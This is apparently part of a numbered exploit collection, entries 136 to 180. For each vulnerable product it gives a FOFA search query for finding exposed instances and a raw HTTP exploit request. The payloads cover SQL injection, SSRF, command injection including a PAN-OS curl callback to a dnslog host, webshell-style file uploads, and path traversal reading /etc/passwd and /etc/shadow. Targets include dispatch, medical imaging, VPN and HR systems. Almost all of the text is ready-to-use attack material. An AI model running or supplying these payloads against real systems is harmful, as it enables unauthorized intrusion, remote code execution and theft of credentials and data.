GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kelixun communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kelixun communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kelixun communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kelixun communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Kelixun communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd into a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianweier fire rescue operational dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the uploaded file: http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达医学影像存档与通信系统 WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>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</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓全智能停车收费系统 Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field gives the file name and the <fileFlow> field carries the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰多媒体信息发布系统 QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团分销管理系统 ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信票务管理平台 SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益价值管理系统 DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星CMSV6车载定位监控平台 SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT-高清车牌识别摄像机 arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. 电信网关配置管理系统 rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C校园网自助服务系统 flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文工程管理系统 arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
